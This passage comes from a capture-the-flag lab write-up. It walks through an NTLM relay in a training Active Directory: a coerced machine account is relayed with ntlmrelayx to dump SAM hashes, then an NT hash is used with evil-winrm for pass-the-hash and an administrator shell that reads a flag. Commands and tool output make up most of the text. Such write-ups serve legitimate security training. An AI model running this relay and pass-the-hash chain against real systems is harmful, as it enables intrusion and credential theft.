The "Error Code 1707" that SpoolSample prints is typical and does not mean the coercion failed; the spooler has already tried to connect back to us by then, as the relay log confirms. After this step our attack machine receives the authentication attempt and relays it to THMSERVER1. When starting ntlmrelayx we could add -c 'whoami /all' to execute a command; if no command is given, ntlmrelayx performs a hashdump (dumps the local SAM hashes), and we can then use those credentials (for example with pass-the-hash) to get a shell on the target host.

└─$ /usr/share/doc/python3-impacket/examples/ntlmrelayx.py -smb2support -t smb:// -debug  
Impacket v0.11.0 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client MSSQL loaded..
[+] Protocol Attack IMAP loaded..
[+] Protocol Attack IMAPS loaded..
[+] Protocol Attack RPC loaded..
[+] Protocol Attack HTTP loaded..
[+] Protocol Attack HTTPS loaded..
[+] Protocol Attack LDAP loaded..
[+] Protocol Attack LDAPS loaded..
[+] Protocol Attack DCSYNC loaded..
[+] Protocol Attack SMB loaded..
[+] Protocol Attack MSSQL loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from, attacking target smb://
[*] Authenticating against smb:// as ZA/THMSERVER2$ SUCCEED
[+] No more targets
[*] SMBD-Thread-7 (process_request_thread): Connection from controlled, but there are no more targets left!
[+] No more targets
[*] SMBD-Thread-8 (process_request_thread): Connection from controlled, but there are no more targets left!
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[+] Retrieving class info for JD
[+] Retrieving class info for Skew1
[+] Retrieving class info for GBG
[+] Retrieving class info for Data
[*] Target system bootKey: 0x4e05e7ea4fdddde75aa56010474948dc
[+] Saving remote SAM database
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[+] Calculating HashedBootKey from SAM
[+] NewStyle hashes is: True
[+] NewStyle hashes is: True
[+] NewStyle hashes is: True
[+] NewStyle hashes is: True
[+] NewStyle hashes is: True
[+] NewStyle hashes is: True
[+] NewStyle hashes is: True
[+] NewStyle hashes is: True
[*] Done dumping SAM hashes for host:
[*] Stopping service RemoteRegistry


└─$ cat hashes.txt

└─$ evil-winrm -i -u ServerAdmin -H 3279a0c6dfe15dc3fb6e9c26dd9b066c

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>


*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd ..
*Evil-WinRM* PS C:\Users> dir

    Directory: C:\Users

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        4/30/2022  11:07 AM                .NET v2.0
d-----        4/30/2022  11:07 AM                .NET v2.0 Classic
d-----        4/30/2022  11:07 AM                .NET v4.5
d-----        4/30/2022  11:07 AM                .NET v4.5 Classic
d-----        4/25/2022   8:52 PM                Administrator
d-----        4/27/2022   8:32 AM                Administrator.ZA
d-----        4/30/2022  11:07 AM                Classic .NET AppPool
d-----       12/20/2023   1:44 PM                Cub3
d-----       12/20/2023   4:31 PM                elliot
d-r---        3/21/2020   8:25 PM                Public
d-----        6/13/2022   2:43 PM                t1_jake.scott
d-----        6/13/2022   2:32 PM                t1_jay.wilson
d-----       12/20/2023   1:40 PM                t1_jemma.davey
d-----        6/13/2022   2:28 PM                t1_steven.blake
d-----        4/30/2022   3:30 PM                t1_trevor.jones
d-----        4/30/2022   4:15 PM                trevor.local
d-----        3/21/2020   8:52 PM                vagrant

*Evil-WinRM* PS C:\Users> cd Administrator.ZA\Desktop
*Evil-WinRM* PS C:\Users\Administrator.ZA\Desktop> dir

    Directory: C:\Users\Administrator.ZA\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         5/1/2022   3:50 PM             25 flag3.txt

*Evil-WinRM* PS C:\Users\Administrator.ZA\Desktop> type flag3.txt

